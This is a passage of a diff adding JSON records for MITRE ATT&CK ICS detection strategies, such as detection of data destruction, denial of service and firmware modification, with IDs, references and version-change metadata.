+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--edf989d8-7e25-4ed2-b289-a55dee68a75e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0758",
+                            "external_id": "DET0758"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data Destruction",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f666f516-f8d0-41f6-9a4c-0ac6c1f6086b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a366d027-d797-4957-949a-870aed0766dd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0754",
+                            "external_id": "DET0754"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data from Information Repositories",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1672d2e3-8756-4380-b22c-517aa9f1cce0"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3a772c6d-fda2-404a-86aa-85a0bdbb43e9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0749",
+                            "external_id": "DET0749"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Data from Local System",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0099659c-6a20-4331-9d47-b1c0c380fd6b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b04e83cc-8ace-4880-8953-7ce55eb8c427",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0756",
+                            "external_id": "DET0756"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Default Credentials",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f12aa823-91cc-40e1-93b7-eaa5f5fa9c4d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1bae319f-03d8-49c9-8bb8-e4f27bb69a11",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0786",
+                            "external_id": "DET0786"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Denial of Control",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7ec4b791-7054-442f-8967-6d6fa5e8678b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--08c090e3-c56f-4a8b-80f6-307a1daf46ea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0723",
+                            "external_id": "DET0723"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Denial of Service",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cff25f71-859e-48bf-88d6-852d05e22b33"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--13412b71-b94e-4aef-912a-44853f8bff05",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0769",
+                            "external_id": "DET0769"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Denial of View",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--68073351-4e4f-40e4-9394-a9166bb346d7"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e6bc5359-4bd4-4688-9136-ac7a6b561f56",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0768",
+                            "external_id": "DET0768"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Detect Operating Mode",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--899d41e8-8d02-45f9-ab8a-3a06f4cc4189"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--194cb4dd-81ca-4e64-94e2-911fab1219f9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0801",
+                            "external_id": "DET0801"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Device Restart/Shutdown",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fcfe9c48-3a5a-49c8-96c3-be79414a8419"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--89e95503-b02c-43da-90b3-15584b27e6d6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.684000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0782",
+                            "external_id": "DET0782"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Drive-by Compromise",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--32db74f9-d46d-4728-891a-113a8b8e2b07"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.684000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f1a7e304-d05f-4e48-89b7-8b034f507c32",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0742",
+                            "external_id": "DET0742"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Execution through API",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e8f51c53-fc55-441b-a45f-ba7709ccbce2"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ab3f0926-58e2-485e-987c-66b541d9de97",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0740",
+                            "external_id": "DET0740"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploit Public-Facing Application",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dd25b818-ceb0-4518-9384-dcf895d4956b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--97914ffd-b189-415e-9309-e63e3be01b1e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0795",
+                            "external_id": "DET0795"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation for Evasion",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fbd4686e-f637-459b-ad48-c6fd7840acfa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--0f2e4927-401d-430e-96ed-90feb8df1b03",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.668000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0738",
+                            "external_id": "DET0738"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation for Privilege Escalation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b6fb91d0-28f6-447d-ba25-e7b26116ebfe"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.668000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--67c2be08-d31a-4385-a637-9d1a907c7a26",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0767",
+                            "external_id": "DET0767"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Exploitation of Remote Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3e456d4d-397d-4e04-9261-9399960c9633"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e9f6c9ad-7368-43e3-9ba1-c9261323a1d1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0803",
+                            "external_id": "DET0803"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of External Remote Services",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--908fe88b-d8e2-47d1-b6a4-7a42b3bbe09b"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--73773bb8-c63b-4d48-9b48-33440f12a514",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 15:56:01.514000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0904",
+                            "external_id": "DET0904"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Firmware Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fc6641ac-5748-4498-89e9-d4ada2b6f88a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 15:56:01.514000+00:00\", \"old_value\": \"2026-04-22T15:56:01.514Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:30:02.969Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--87493fa2-bb78-4e28-b882-d79eecd10740",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0772",
+                            "external_id": "DET0772"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Graphical User Interface",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--dc014060-5116-4a2f-bac5-35ac1db8fabb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--de675cf4-144e-485c-a761-c72ebcb9e2bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
